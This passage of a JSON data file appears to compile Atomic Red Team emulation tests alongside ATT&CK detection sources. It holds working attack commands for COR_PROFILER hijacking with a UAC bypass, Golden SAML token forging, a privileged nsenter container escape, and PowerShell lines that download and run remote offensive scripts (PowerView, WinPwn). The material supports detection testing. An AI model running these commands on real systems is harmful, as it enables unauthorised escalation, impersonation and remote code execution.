\"#{file_name}\"\n" + } + ], + "executor": { + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "System Scope COR_PROFILER", + "auto_generated_guid": "f373b482-48c8-4ce4-85ed-d40c8b3f7310", + "description": "Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.\nThe unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity\nlevel of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will\nstill execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unmanaged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + } + ], + "executor": { + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "cleanup_command": "Remove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Registry-free process scope COR_PROFILER", + "auto_generated_guid": "79d57242-bbef-41db-b301-9d01d9f6e817", + "description": "Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unamanged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + } + ], + "executor": { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "cleanup_command": "$env:COR_ENABLE_PROFILING = 0\n$env:COR_PROFILER = ''\n$env:COR_PROFILER_PATH = ''\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1606.002", + "command_list": [ + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \".\\ADFS_signing.pfx\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"aehgdqBTZV50DKQZmNJ8mg==\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"http://contoso.com/adfs/services/trust/\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n" + ], + "commands": [ + { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \".\\ADFS_signing.pfx\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + }, + { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"aehgdqBTZV50DKQZmNJ8mg==\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + }, + { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"http://contoso.com/adfs/services/trust/\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1606.002", + "display_name": "Forge Web Credentials: SAML token", + "atomic_tests": [ + { + "name": "Golden SAML", + "auto_generated_guid": "b16a03bc-1089-4dcc-ad98-30fe8f3a2b31", + "description": "Forge a \"Golden SAML\" token which allows to impersonate any Azure AD user, and authenticate to AADGraph (as a proof). \nYou will need the ADFS token signing certificate (see T1552.004 to export it).\nMore info here : https://o365blog.com/post/adfs/\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "certificate_path": { + "description": "Token signing certificate path. See T1552.004 to export it", + "type": "Path", + "default": ".\\ADFS_signing.pfx" + }, + "immutable_id": { + "description": "ImmutableId of the targeted user. It can be obtained with AzureAD powershell module; $(Get-AzureADUser -SearchString \"username\").ImmutableId", + "type": "String", + "default": "aehgdqBTZV50DKQZmNJ8mg==" + }, + "issuer_uri": { + "description": "Issuer URI of the ADFS service", + "type": "String", + "default": "http://contoso.com/adfs/services/trust/" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals module must be installed.\n", + "prereq_command": "if (Get-Module AADInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1609", + "command_list": [ + "kubectl create -f src/busybox.yaml -n default\nkubectl exec -n default busybox -- #{command}\n", + "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- uname\n" + ], + "commands": [ + { + "command": "kubectl create -f src/busybox.yaml -n default\nkubectl exec -n default busybox -- #{command}\n", + "source": "atomics/T1609/T1609.yaml", + "name": "Atomic Red Team Test - Kubernetes Exec Into Container" + }, + { + "command": "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- uname\n", + "source": "atomics/T1609/T1609.yaml", + "name": "Atomic Red Team Test - Kubernetes Exec Into Container" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1609", + "display_name": "Kubernetes Exec Into Container", + "atomic_tests": [ + { + "name": "ExecIntoContainer", + "auto_generated_guid": "d03bfcd3-ed87-49c8-8880-44bb772dea4b", + "description": "Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (\u201ckubectl exec\u201d). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using \u201ckubectl exec\u201d.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to use", + "type": "String", + "default": "default" + }, + "command": { + "description": "Command to run", + "type": "String", + "default": "uname" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- #{command}\n", + "cleanup_command": "kubectl delete pod busybox -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1611", + "command_list": [ + "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n" + ], + "commands": [ + { + "command": "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n", + "source": "atomics/T1611/T1611.yaml", + "name": "Atomic Red Team Test - Escape to Host" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1611", + "display_name": "Escape to Host", + "atomic_tests": [ + { + "name": "Deploy container using nsenter container escape", + "auto_generated_guid": "0b2f9520-a17a-4671-9dba-3bd034099fff", + "description": "In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.\n\nAdditional Details:\n- https://twitter.com/mauilion/status/1129468485480751104\n- https://securekubernetes.com/scenario_2_attack/\n", + "supported_platforms": [ + "containers" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify docker is installed.", + "prereq_command": "which docker\n", + "get_prereq_command": "if [ \"\" == \"`which docker`\" ]; then echo \"Docker Not Found\"; if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install docker ; elif [ -n \"`which yum`\" ]; then sudo yum -y install docker ; fi ; else echo \"Docker installed\"; fi\n" + }, + { + "description": "Verify docker service is running.", + "prereq_command": "sudo systemctl status docker\n", + "get_prereq_command": "sudo systemctl start docker\n" + }, + { + "description": "Verify kind is in the path.", + "prereq_command": "which kind\n", + "get_prereq_command": "curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64\nchmod +x ./kind\nmv kind /usr/bin/kind\n" + }, + { + "description": "Verify kind-atomic-cluster is created", + "prereq_command": "sudo kind get clusters\n", + "get_prereq_command": "sudo kind create cluster --name atomic-cluster\n" + }, + { + "description": "Verify kubectl is in path", + "prereq_command": "which kubectl\n", + "get_prereq_command": "curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\"\nchmod +x ./kubectl\nmv kubectl /usr/bin/kubectl\n" + } + ], + "executor": { + "command": "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n", + "name": "sh", + "cleanup_command": "kubectl --context kind-atomic-cluster delete pod atomic-escape-pod\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1614.001", + "command_list": [ + "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "chcp\n" + ], + "commands": [ + { + "command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "source": "atomics/T1614.001/T1614.001.yaml", + "name": "Atomic Red Team Test - System Location Discovery: System Language Discovery" + }, + { + "command": "chcp\n", + "source": "atomics/T1614.001/T1614.001.yaml", + "name": "Atomic Red Team Test - System Location Discovery: System Language Discovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1614.001", + "display_name": "System Location Discovery: System Language Discovery", + "atomic_tests": [ + { + "name": "Discover System Language by Registry Query", + "auto_generated_guid": "631d4cf1-42c9-4209-8fe9-6bd4de9421be", + "description": "Identify System language by querying the registry on an endpoint. \n\nUpon successful execution, result in number format can be looked up to correlate the language.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "name": "command_prompt" + } + }, + { + "name": "Discover System Language with chcp", + "auto_generated_guid": "d91473ca-944e-477a-b484-0e80217cd789", + "description": "Identify System language with the chcp command.\n\nUpon successful execution, result in number format can be looked up to correlate the language.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "chcp\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1615", + "command_list": [ + "gpresult /z\n", + "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> $env:temp\\GPO_Output.txt", + "Get-GPO -Domain $ENV:userdnsdomain -All >> #{gpo_output}" + ], + "commands": [ + { + "command": "gpresult /z\n", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> $env:temp\\GPO_Output.txt", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "Get-GPO -Domain $ENV:userdnsdomain -All >> #{gpo_output}", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1615", + "display_name": "Group Policy Discovery", + "atomic_tests": [ + { + "name": "Display group policy information via gpresult", + "auto_generated_guid": "0976990f-53b1-4d3f-a185-6df5be429d3b", + "description": "Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer\nThe /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\nTurla has used the /z and /v parameters: 